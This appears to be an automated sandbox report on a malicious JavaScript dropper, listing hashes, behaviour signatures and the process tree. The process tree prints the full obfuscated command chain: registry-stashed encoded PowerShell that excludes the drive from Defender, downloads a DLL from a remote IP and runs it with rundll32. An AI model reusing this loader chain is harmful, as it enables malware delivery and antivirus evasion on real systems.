Resubmissions

13/03/2023, 14:06

230313-relmjscg3x 1

13/03/2023, 13:56

230313-q8qb6acf9t 8

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/03/2023, 13:56

General

  • Target

    DOCX#qMTnY(245).js

  • Size

    108KB

  • MD5

    a2cfdb41e8533293b1dc5278fd36501e

  • SHA1

    4b9bab73bacf21939ac73545c6c532c9ce656327

  • SHA256

    7742093c2d008a0ea1b3eb75baed013aaf7fe2e7c40fed45b67e37a63df08afd

  • SHA512

    21ca46c0fc3b9e4356921aee70b766d296a04af668d521ce1508e410b542d86bb7106044f1f96e2d7ca65b06beed931fc754aaebd031dea8265dedf40f5b2a2a

  • SSDEEP

    3072:prXirXd1SWSaZGOS6jj+PLGtci8m1z1AK5/a6MZ:pr+Xd1SWSaZGkjj+jA78m1zU6MZ

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry key 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\DOCX#qMTnY(245).js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4244
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\QuindecimStithy /v poromata /d TVDofYVGGELwKRHNxqWlCDiiTrzlsEetsnsLzNooMJaQrsmoBBjuZzRHxebjTWvxqSkhvUucxMNiheUCAgkwhqpeZtJKFFqhywWHFiebsMjpPZVMSfVNTpswqZbbQngBUhlGgIIo
      2⤵
      • Modifies registry key
      PID:1852
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\decapodousDelayingly /v Homerite /d BlAHIAcwAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFEAdQBpAG4AZABlAGMAaQBtAFMAdABpAHQAaAB5ACAAfAAgACUAewAkAF8ALgBIAG8AbQBlAHIAaQB0AGUAfQA7ACAAJABXAGkAdgBlAHIAcwAgAD0AIAAiAHAAcgBvAHMAbwBkAGkAYQBjAFAAaAB5AGwAbABvAHMAYwBvAHAAdQBzACIAIAArACAAJABXAGkAdgBlAHIAcwA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBpAHYAZQByAHMAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABRAHUAaQBuAGQAZQBjAGkAbQBTAHQAaQB0AGgAeQAgAC8AdgAgAEgAbwBtAGUAcgBpAHQAZQAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADkANAAuADIAMQAzAC4AMQA4AC4AMQA0ADIALwBvADMAWQBoAFgAbgAvADAAMAAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABQAGkAYwBrAHAAbwBjAGsAZQB0AC4AZABsAGwAOwAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABQAGkAYwBrAHAAbwBjAGsAZQB0AC4AZABsAGwALABYAEwANQA1ADsA
      2⤵
      • Modifies registry key
      PID:2964
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\decapodousDelayingly /v Unconsummative /d lmfNeTXdhvUGhcIwWxEHnFXLuCQQSdYPVTJuLvynloWALCgrLkcvHoJROpVTDGuvLengbApceWjXknhAMYtAVegVVnjsSdiZxqLIErWwXWQIAtTtvosutSgNwCottKVDlATqERuwZJrkGIBYaCLXyBojpTWlhmbGeCnNZhjPYEJYffDUFuwBXhoiWVktywJcKIYHyLGSALUZosqTXsrgNQSvDyVjytwAZIWCWUnlSJuMAvWPjUbriNIzQFWbaTdoccDnIASSvBVcfuIAElizJcaKsURTOWxKXGBiBDIlwOWYCwaPalTxcyVFyKHtVeSKAjxtemtnMuNTKCySQLaPScjAIMetUjidpNsYqFYnjoOGNKYruldwbjufyuZmGxmebHKHGAhL
      2⤵
      • Modifies registry key
      PID:1712
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\decapodousDelayingly /v materializerMonologies /d YRekQUCVQiGWXoMcwPKuSrqYgYShSVdTTlvYWASvjnVixyvFiXZNMmHRLEruppYwUTatNQSlIPxSFzOiJJKuuvXhQFWdsefFJXbXKXfIlRWenVJTJuMbNCsqmDYXtgTEJqWyMDxaqMlVXZgcKCKxwGlBCqYyYeaxxlAauaosJvaJnAysrHFIPgesadyTQDulpWWLZSzrWzdwPBNqzSPWOUbSbVbjxMhrtEuRacbJNJQjaJTEVradFTHLGHCRnkLfYuODgjiHkrWEBAOXmg
      2⤵
      • Modifies registry key
      PID:4164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $decapodousDelayingly = Get-ItemProperty -Path HKCU:\SOFTWARE\decapodousDelayingly | %{$_.Homerite}; powershell -windowstyle Minimized -encodedcommand "JABXAGkAdg$decapodousDelayingly"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5048
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABXAGkAdgBlAHIAcwAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFEAdQBpAG4AZABlAGMAaQBtAFMAdABpAHQAaAB5ACAAfAAgACUAewAkAF8ALgBIAG8AbQBlAHIAaQB0AGUAfQA7ACAAJABXAGkAdgBlAHIAcwAgAD0AIAAiAHAAcgBvAHMAbwBkAGkAYQBjAFAAaAB5AGwAbABvAHMAYwBvAHAAdQBzACIAIAArACAAJABXAGkAdgBlAHIAcwA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBpAHYAZQByAHMAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABRAHUAaQBuAGQAZQBjAGkAbQBTAHQAaQB0AGgAeQAgAC8AdgAgAEgAbwBtAGUAcgBpAHQAZQAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADkANAAuADIAMQAzAC4AMQA4AC4AMQA0ADIALwBvADMAWQBoAFgAbgAvADAAMAAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABQAGkAYwBrAHAAbwBjAGsAZQB0AC4AZABsAGwAOwAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABQAGkAYwBrAHAAbwBjAGsAZQB0AC4AZABsAGwALABYAEwANQA1ADsA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:60
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\Pickpocket.dll,XL55
          4⤵
            PID:2072

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      223bd4ae02766ddc32e6145fd1a29301

      SHA1

      900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

      SHA256

      1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

      SHA512

      648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      a6c9d692ed2826ecb12c09356e69cc09

      SHA1

      def728a6138cf083d8a7c61337f3c9dade41a37f

      SHA256

      a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

      SHA512

      2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hfsmne02.xgo.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/60-160-0x0000026B6E340000-0x0000026B6E350000-memory.dmp

      Filesize

      64KB

    • memory/60-154-0x0000026B6E340000-0x0000026B6E350000-memory.dmp

      Filesize

      64KB

    • memory/60-155-0x0000026B6E340000-0x0000026B6E350000-memory.dmp

      Filesize

      64KB

    • memory/60-156-0x0000026B6E340000-0x0000026B6E350000-memory.dmp

      Filesize

      64KB

    • memory/60-162-0x0000026B6E340000-0x0000026B6E350000-memory.dmp

      Filesize

      64KB

    • memory/60-161-0x0000026B6E340000-0x0000026B6E350000-memory.dmp

      Filesize

      64KB

    • memory/5048-144-0x0000024332970000-0x0000024332980000-memory.dmp

      Filesize

      64KB

    • memory/5048-159-0x0000024332970000-0x0000024332980000-memory.dmp

      Filesize

      64KB

    • memory/5048-158-0x0000024332970000-0x0000024332980000-memory.dmp

      Filesize

      64KB

    • memory/5048-157-0x0000024332970000-0x0000024332980000-memory.dmp

      Filesize

      64KB

    • memory/5048-133-0x000002434E680000-0x000002434E6A2000-memory.dmp

      Filesize

      136KB

    • memory/5048-143-0x0000024332970000-0x0000024332980000-memory.dmp

      Filesize

      64KB